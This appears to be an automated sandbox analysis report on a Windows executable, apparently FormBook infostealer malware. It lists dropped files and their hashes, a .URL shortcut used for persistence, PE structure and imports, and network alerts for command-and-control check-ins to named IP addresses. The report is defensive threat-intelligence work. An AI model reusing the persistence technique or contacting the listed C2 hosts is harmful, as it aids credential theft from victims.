                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Jwjxmakrv.exe">), ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):101
                                                                                                Entropy (8bit):5.111894002506988
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMu3OXssGKd9Z1K9Nvn:HRYFVmTWDyzM8sb9+9Nvn
                                                                                                MD5:A553164F243E721C88BC5F6A0699FD55
                                                                                                SHA1:5F6A7A4F441E430AABE86F2FF147B4C74D84B8EF
                                                                                                SHA-256:970C203850156B46EC573931B26B2C427821439BCA58F7FBF48257CCB5BA4F3E
                                                                                                SHA-512:11CD62E8792A3410D31BD135682718BF33968A97026C19CCEE98D22A5701A8768A4CE4A958E9A8E3B4429C04172B2567A2CBC2DBBC4D2DEC47FAD2957F623276
                                                                                                Malicious:false
                                                                                                Yara Hits:
                                                                                                • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\vrkamxjwJ.url, Author: @itsreallynick (Nick Carr)
                                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\vrkamxjwJ.url, Author: @itsreallynick (Nick Carr)
                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Jwjxmakrv.exe"..IconIndex=59..HotKey=74..
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):176597
                                                                                                Entropy (8bit):7.830686234749823
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:cjHDWPRtl/liILyOfXNwjptqiI1J6+UJ6JUd1x+FKUPJZ74X018UMrwnW7:mj2ziILpCptqiI1J3CoUd1sKUPJZ74ku
                                                                                                MD5:98840D0581C20BDB663864FEA9208218
                                                                                                SHA1:0195409F121CFAE2B8D3F12E6F986A677AE2B413
                                                                                                SHA-256:99E2BA1CCDBE8DE7176AF71B679B5BCB4436C3BA310FDA0CA2714EDBC3BA0E3A
                                                                                                SHA-512:A76FAD5C68A3D5935E1E3C689D9EBE7E55A403597A21D3DD3AEDC904C031D0ACD4427268A6A35992875F3EAB072E67509ED7A9FBFAECC77B27459D1A62858962
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):176597
                                                                                                Entropy (8bit):7.830686234749823
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:cjHDWPRtl/liILyOfXNwjptqiI1J6+UJ6JUd1x+FKUPJZ74X018UMrwnW7:mj2ziILpCptqiI1J3CoUd1sKUPJZ74ku
                                                                                                MD5:98840D0581C20BDB663864FEA9208218
                                                                                                SHA1:0195409F121CFAE2B8D3F12E6F986A677AE2B413
                                                                                                SHA-256:99E2BA1CCDBE8DE7176AF71B679B5BCB4436C3BA310FDA0CA2714EDBC3BA0E3A
                                                                                                SHA-512:A76FAD5C68A3D5935E1E3C689D9EBE7E55A403597A21D3DD3AEDC904C031D0ACD4427268A6A35992875F3EAB072E67509ED7A9FBFAECC77B27459D1A62858962
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):176597
                                                                                                Entropy (8bit):7.830686234749823
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:cjHDWPRtl/liILyOfXNwjptqiI1J6+UJ6JUd1x+FKUPJZ74X018UMrwnW7:mj2ziILpCptqiI1J3CoUd1sKUPJZ74ku
                                                                                                MD5:98840D0581C20BDB663864FEA9208218
                                                                                                SHA1:0195409F121CFAE2B8D3F12E6F986A677AE2B413
                                                                                                SHA-256:99E2BA1CCDBE8DE7176AF71B679B5BCB4436C3BA310FDA0CA2714EDBC3BA0E3A
                                                                                                SHA-512:A76FAD5C68A3D5935E1E3C689D9EBE7E55A403597A21D3DD3AEDC904C031D0ACD4427268A6A35992875F3EAB072E67509ED7A9FBFAECC77B27459D1A62858962
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.792852251086831
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):232960
                                                                                                Entropy (8bit):6.429241692577143
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:d6QAoDVAgvnElWG910GD9s0fd4jNAPjGDi9J0m+l:dbDVP4WA10GpsCd4jNOGiir
                                                                                                MD5:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                SHA1:502285D9914448259E73B18843B088FE972841D6
                                                                                                SHA-256:3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
                                                                                                SHA-512:79487FEFEAB94DB6FD72B302B04DF8191E5158B5A57595EFB86825D2EA55944925E1572FC3B8101D7C6B20738BD0E857850D9BDBD91811018063D28FE6636BDD
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 0%
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.259958009937081
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                                • InstallShield setup (43055/19) 0.43%
                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                File name:TR0627729920002.exe
                                                                                                File size:938496
                                                                                                MD5:8dbfe68662123710d83fef939287d9a3
                                                                                                SHA1:9481ef5498dd490e4efe83601f916ee48f61e649
                                                                                                SHA256:663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
                                                                                                SHA512:2f3589181a606a3342726b92ecbdf722e43752a281a7e628de44f142b75bb7150814d515d2c03495f52362106b3f9d8990de4661e60cf8104f2f5ec6bcd161bc
                                                                                                SSDEEP:24576:xnMYEbTjfaxtdqQVESreixHfk1PziiUS1yj:xnp8fs7/k1PLqj
                                                                                                TLSH:AE15BEF6E68104F3CC22953BCD0AAD59E13A7E642E2CD54B6BE43EDC4B745C0381B59A
                                                                                                Icon Hash:18db1ccadc5c5b18
                                                                                                Entrypoint:0x46e790
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                DLL Characteristics:
                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: cc1fadbd23c2bfd0a0322aa7e67d1d3f
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046D498h
call 00007F33D102DD49h
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
call 00007F33D107B29Dh
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
mov edx, 0046E7F0h
call 00007F33D107AD24h
mov ecx, dword ptr [0049E370h]
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046C444h]
call 00007F33D107B28Ch
mov eax, dword ptr [0049E398h]
mov eax, dword ptr [eax]
call 00007F33D107B300h
call 00007F33D102BE0Fh
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa3000 | 0x2804 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaf000 | 0xd200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa8000 | 0x6230 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa7000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa3774 | 0x634 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6c6d0 | 0x6c800 | False | 0.5343349474366359 | data | 6.574486068299734 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x6e000 | 0x804 | 0xa00 | False | 0.5125 | data | 5.495016511395614 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x6f000 | 0x2f518 | 0x2f600 | False | 0.5352490105540897 | data | 7.287870053980081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x9f000 | 0x37f8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa3000 | 0x2804 | 0x2a00 | False | 0.3078497023809524 | data | 4.926344413190151 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa6000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa7000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa8000 | 0x6230 | 0x6400 | False | 0.638359375 | data | 6.654765582765188 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xaf000 | 0xd200 | 0xd200 | False | 0.10805431547619047 | data | 3.352529991615067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0xaf71c | 0x134 | data | English | United States
RT_CURSOR | 0xaf850 | 0x134 | data | English | United States
RT_CURSOR | 0xaf984 | 0x134 | data | English | United States
RT_CURSOR | 0xafab8 | 0x134 | data | English | United States
RT_CURSOR | 0xafbec | 0x134 | data | English | United States
RT_CURSOR | 0xafd20 | 0x134 | data | English | United States
RT_CURSOR | 0xafe54 | 0x134 | data | English | United States
RT_ICON | 0xaff88 | 0x94a8 | data | |
RT_ICON | 0xb9430 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_STRING | 0xb9898 | 0x2f8 | data | |
RT_STRING | 0xb9b90 | 0xbc | data | |
RT_STRING | 0xb9c4c | 0x110 | data | |
RT_STRING | 0xb9d5c | 0x4a0 | data | |
RT_STRING | 0xba1fc | 0x348 | data | |
RT_STRING | 0xba544 | 0x394 | data | |
RT_STRING | 0xba8d8 | 0x3f8 | data | |
RT_STRING | 0xbacd0 | 0xf4 | data | |
RT_STRING | 0xbadc4 | 0xc4 | data | |
RT_STRING | 0xbae88 | 0x22c | data | |
RT_STRING | 0xbb0b4 | 0x3b4 | data | |
RT_STRING | 0xbb468 | 0x368 | data | |
RT_STRING | 0xbb7d0 | 0x2b8 | data | |
RT_RCDATA | 0xbba88 | 0x10 | data | |
RT_RCDATA | 0xbba98 | 0x2d8 | data | |
RT_RCDATA | 0xbbd70 | 0x1e5 | Delphi compiled form 'TDuckForm' | |
RT_GROUP_CURSOR | 0xbbf58 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xbbf6c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xbbf80 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xbbf94 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xbbfa8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xbbfbc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xbbfd0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_ICON | 0xbbfe4 | 0x22 | data | |
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, ChangeDisplaySettingsA, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | TransparentBlt, AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, InitializeAcl
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
URLAddMIMEFileTypesPS
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/08/22-20:15:40.535789 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49861 | 80 | 192.168.2.3 | 38.54.163.57
08/08/22-20:16:21.818812 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49863 | 80 | 192.168.2.3 | 15.197.142.173
08/08/22-20:14:24.056805 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.3 | 34.102.136.180
08/08/22-20:15:40.535789 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49861 | 80 | 192.168.2.3 | 38.54.163.57
08/08/22-20:16:21.818812 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49863 | 80 | 192.168.2.3 | 15.197.142.173
08/08/22-20:15:40.535789 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49861 | 80 | 192.168.2.3 | 38.54.163.57
08/08/22-20:14:29.416650 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.3 | 198.54.117.218
08/08/22-20:14:24.056805 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.3 | 34.102.136.180
08/08/22-20:14:24.056805 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49839 | 80 | 192.168.2.3 | 34.102.136.180
08/08/22-20:14:29.416650 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.3 | 198.54.117.218
08/08/22-20:14:34.726453 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.3 | 2.57.90.16
08/08/22-20:14:29.416650 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49849 | 80 | 192.168.2.3 | 198.54.117.218
08/08/22-20:16:21.818812 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49863 | 80 | 192.168.2.3 | 15.197.142.173
08/08/22-20:14:34.726453 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.3 | 2.57.90.16
08/08/22-20:14:34.726453 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49850 | 80 | 192.168.2.3 | 2.57.90.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 20:12:06.970721960 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:06.970777035 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:06.970897913 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.000993967 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.001035929 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.099013090 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.099107981 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.347546101 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.347594023 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.348143101 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.348376036 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.350692034 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.391401052 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.936290026 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.936433077 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:07.936461926 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:07.936553955 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.005918980 CEST | 49728 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.005959988 CEST | 443 | 49728 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:08.553364038 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.553414106 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:08.553508043 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.554105043 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.554135084 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:08.640991926 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:08.641114950 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.641644001 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.641664028 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:08.645796061 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:08.645817995 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:09.346910954 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:09.347021103 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:09.347054958 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:09.347173929 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:09.348762035 CEST | 49737 | 443 | 192.168.2.3 | 13.107.43.13
Aug 8, 2022 20:12:09.348795891 CEST | 443 | 49737 | 13.107.43.13 | 192.168.2.3
Aug 8, 2022 20:12:29.505234957 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.505291939 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.505388975 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.506093979 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.506124973 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.589283943 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.589453936 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.591114044 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.591228008 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.667932987 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.667958975 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.668307066 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.668385983 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.669054031 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
